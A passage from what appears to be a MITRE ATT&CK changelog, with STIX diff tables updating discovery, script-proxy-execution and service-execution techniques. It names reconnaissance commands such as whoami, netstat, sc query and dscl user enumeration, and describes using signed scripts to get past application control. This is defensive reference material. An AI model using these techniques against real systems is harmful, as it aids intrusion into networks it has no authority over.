| x_mitre_data_sources[3] | Process: OS API Execution | Process: Process Creation |
| x_mitre_data_sources[4] | Command: Command Execution | File: File Creation |
| x_mitre_data_sources[5] | Windows Registry: Windows Registry Key Modification | Network Traffic: Network Connection Creation |
| x_mitre_data_sources[6] | Network Traffic: Network Connection Creation | Process: OS API Execution |
| x_mitre_version | 2.1 | 3.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'GTFO split', 'description': 'GTFOBins. (2020, November 13). split. Retrieved April 18, 2022.', 'url': 'https://gtfobins.github.io/gtfobins/split/'} | |
| external_references | {'source_name': 'LOLBAS Project', 'description': 'Oddvar Moe et al. (2022, February). Living Off The Land Binaries, Scripts and Libraries. Retrieved March 7, 2022.', 'url': 'https://github.com/LOLBAS-Project/LOLBAS#criteria'} | |
| external_references | {'source_name': 'split man page', 'description': 'Torbjorn Granlund, Richard M. Stallman. (2020, March null). split(1) — Linux manual page. Retrieved March 25, 2022.', 'url': 'https://man7.org/linux/man-pages/man1/split.1.html'} | |
| x_mitre_contributors | Wes Hurd | |
| x_mitre_platforms | Linux | |
| x_mitre_platforms | macOS |
| Old Description | New Description |
|---|---|
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS. As an example, adversaries with user-level access can execute the df -aH command to obtain currently mounted disks and associated freely available space. [System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques) Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API) |
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS. As an example, adversaries with user-level access can execute the df -aH command to obtain currently mounted disks and associated freely available space. Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather detailed system information (e.g. show version).(Citation: US-CERT-TA18-106A) [System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)
Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API) |
Dropped Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Amazon. (n.d.). describe-instance-information. Retrieved March 3, 2020. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| external_references | CAPEC-312 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-13 23:21:27.750000+00:00 | 2022-09-06 22:11:56.413000+00:00 |
| description | An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS. As an example, adversaries with user-level access can execute the df -aH command to obtain currently mounted disks and associated freely available space. [System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)
Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API) |
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS. As an example, adversaries with user-level access can execute the df -aH command to obtain currently mounted disks and associated freely available space. Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather detailed system information (e.g. show version).(Citation: US-CERT-TA18-106A) [System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)
Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API) |
| external_references[1]['source_name'] | capec | Amazon Describe Instance |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/312.html | https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html |
| external_references[2]['source_name'] | OSX.FairyTale | Google Instances Resource |
| external_references[2]['description'] | Phile Stokes. (2018, September 20). On the Trail of OSX.FairyTale | Adware Playing at Malware. Retrieved August 24, 2021. | Google. (n.d.). Rest Resource: instance. Retrieved March 3, 2020. |
| external_references[2]['url'] | https://www.sentinelone.com/blog/trail-osx-fairytale-adware-playing-malware/ | https://cloud.google.com/compute/docs/reference/rest/v1/instances |
| external_references[3]['source_name'] | 20 macOS Common Tools and Techniques | Microsoft Virutal Machine API |
| external_references[3]['description'] | Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021. | Microsoft. (2019, March 1). Virtual Machines - Get. Retrieved October 8, 2019. |
| external_references[3]['url'] | https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/ | https://docs.microsoft.com/en-us/rest/api/compute/virtualmachines/get |
| external_references[4]['source_name'] | Amazon Describe Instance | 20 macOS Common Tools and Techniques |
| external_references[4]['description'] | Amazon. (n.d.). describe-instance-information. Retrieved March 3, 2020. | Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021. |
| external_references[4]['url'] | https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html | https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/ |
| external_references[5]['source_name'] | Google Instances Resource | OSX.FairyTale |
| external_references[5]['description'] | Google. (n.d.). Rest Resource: instance. Retrieved March 3, 2020. | Phile Stokes. (2018, September 20). On the Trail of OSX.FairyTale | Adware Playing at Malware. Retrieved August 24, 2021. |
| external_references[5]['url'] | https://cloud.google.com/compute/docs/reference/rest/v1/instances | https://www.sentinelone.com/blog/trail-osx-fairytale-adware-playing-malware/ |
| external_references[6]['source_name'] | Microsoft Virutal Machine API | US-CERT-TA18-106A |
| external_references[6]['description'] | Microsoft. (2019, March 1). Virtual Machines - Get. Retrieved October 8, 2019. | US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020. |
| external_references[6]['url'] | https://docs.microsoft.com/en-us/rest/api/compute/virtualmachines/get | https://www.us-cert.gov/ncas/alerts/TA18-106A |
| x_mitre_data_sources[0] | Instance: Instance Metadata | Process: OS API Execution |
| x_mitre_detection | System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations. | System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to gather detailed system information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. 
Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations. |
| x_mitre_version | 2.3 | 2.5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/312.html', 'external_id': 'CAPEC-312'} | |
| x_mitre_contributors | Austin Clark, @c2defense | |
| x_mitre_platforms | Network |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: OS API Execution |
| Old Description | New Description |
|---|---|
| Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103). Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. | Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. show ip route, show ip interface).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion )
Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Austin Clark, @c2defense'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Gyler, C.,Perez D.,Jones, S.,Miller, S.. (2021, February 25). This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved February 17, 2022. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| external_references | CAPEC-309 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-08 00:17:37.881000+00:00 | 2022-09-06 22:32:35.833000+00:00 |
| description | Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103). Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. | Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. show ip route, show ip interface).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion )
Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. |
| external_references[1]['source_name'] | capec | Mandiant APT41 Global Intrusion |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/309.html | https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits |
| x_mitre_data_sources[0] | Process: Process Creation | Command: Command Execution |
| x_mitre_data_sources[2] | Command: Command Execution | Process: Process Creation |
| x_mitre_detection | System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). | System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). |
| x_mitre_version | 1.3 | 1.5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'US-CERT-TA18-106A', 'description': 'US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-106A'} | |
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/309.html', 'external_id': 'CAPEC-309'} | |
| x_mitre_platforms | Network |
| Old Description | New Description |
|---|---|
| Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to "net session". |
Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.
Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to "net session". Additionally, built-in features native to network devices and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g. show ip sockets, show tcp brief).(Citation: US-CERT-TA18-106A) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-08 10:33:01.083000+00:00 | 2022-09-06 22:35:34.231000+00:00 |
| description | Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview)
Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to "net session". |
Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.
Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to "net session". Additionally, built-in features native to network devices and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g. show ip sockets, show tcp brief).(Citation: US-CERT-TA18-106A) |
| x_mitre_detection | System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). | System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). |
| x_mitre_version | 2.2 | 2.4 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'US-CERT-TA18-106A', 'description': 'US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-106A'} | |
| x_mitre_contributors | Austin Clark, @c2defense | |
| x_mitre_data_sources | Process: Process Creation | |
| x_mitre_platforms | Network |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation |
| Description |
|---|
| Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Various utilities and commands may acquire this information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. Environment variables, such as %USERNAME% and $USER, may also be used to access this information. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-12 13:34:34.153000+00:00 | 2022-04-20 19:04:03.271000+00:00 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Windows Registry: Windows Registry Key Access | |
| x_mitre_data_sources | Process: Process Access | |
| x_mitre_data_sources | Network Traffic: Network Traffic Flow | |
| x_mitre_data_sources | File: File Access | |
| x_mitre_data_sources | Process: OS API Execution | |
| x_mitre_data_sources | Active Directory: Active Directory Object Access | |
| x_mitre_data_sources | Network Traffic: Network Traffic Content |
| Old Description | New Description |
|---|---|
| Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List) | Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.(Citation: LOLBAS Project) This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-09-01 00:57:01.576000+00:00 | 2022-04-18 14:43:46.045000+00:00 |
| name | Signed Script Proxy Execution | System Script Proxy Execution |
| description | Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List) | Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.(Citation: LOLBAS Project) This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List) |
| x_mitre_version | 1.1 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'LOLBAS Project', 'description': 'Oddvar Moe et al. (2022, February). Living Off The Land Binaries, Scripts and Libraries. Retrieved March 7, 2022.', 'url': 'https://github.com/LOLBAS-Project/LOLBAS#criteria'} | |
| x_mitre_contributors | Wes Hurd | |
| x_mitre_data_sources | Process: Process Creation |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation |
| Old Description | New Description |
|---|---|
| Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using [Tasklist](https://attack.mitre.org/software/S0057), and "net start" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well. Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. | Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as sc query, tasklist /svc, systemctl --type=service, and net start.
Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Harshal Tupsamudre, Qualys'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator', 'SYSTEM'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 14:10:36.992000+00:00 | 2022-07-15 13:35:54.740000+00:00 |
| description | Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using [Tasklist](https://attack.mitre.org/software/S0057), and "net start" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well. Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. | Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as sc query, tasklist /svc, systemctl --type=service, and net start.
Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. |
| x_mitre_data_sources[0] | Process: Process Creation | Command: Command Execution |
| x_mitre_data_sources[1] | Command: Command Execution | Process: OS API Execution |
| x_mitre_version | 1.2 | 1.4 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation | |
| x_mitre_platforms | Linux |
| Description |
|---|
| Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence ([Create or Modify System Process](https://attack.mitre.org/techniques/T1543)), but adversaries can also abuse services for one-time or temporary execution. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 18:40:23.888000+00:00 | 2022-03-22 17:29:46.189000+00:00 |
| x_mitre_data_sources[0] | Command: Command Execution | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[1] | Process: Process Creation | Command: Command Execution |
| x_mitre_data_sources[2] | Service: Service Creation | Process: Process Creation |
| x_mitre_data_sources[4] | Windows Registry: Windows Registry Key Modification | Service: Service Creation |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms | Linux |
| Old Description | New Description |
|---|---|
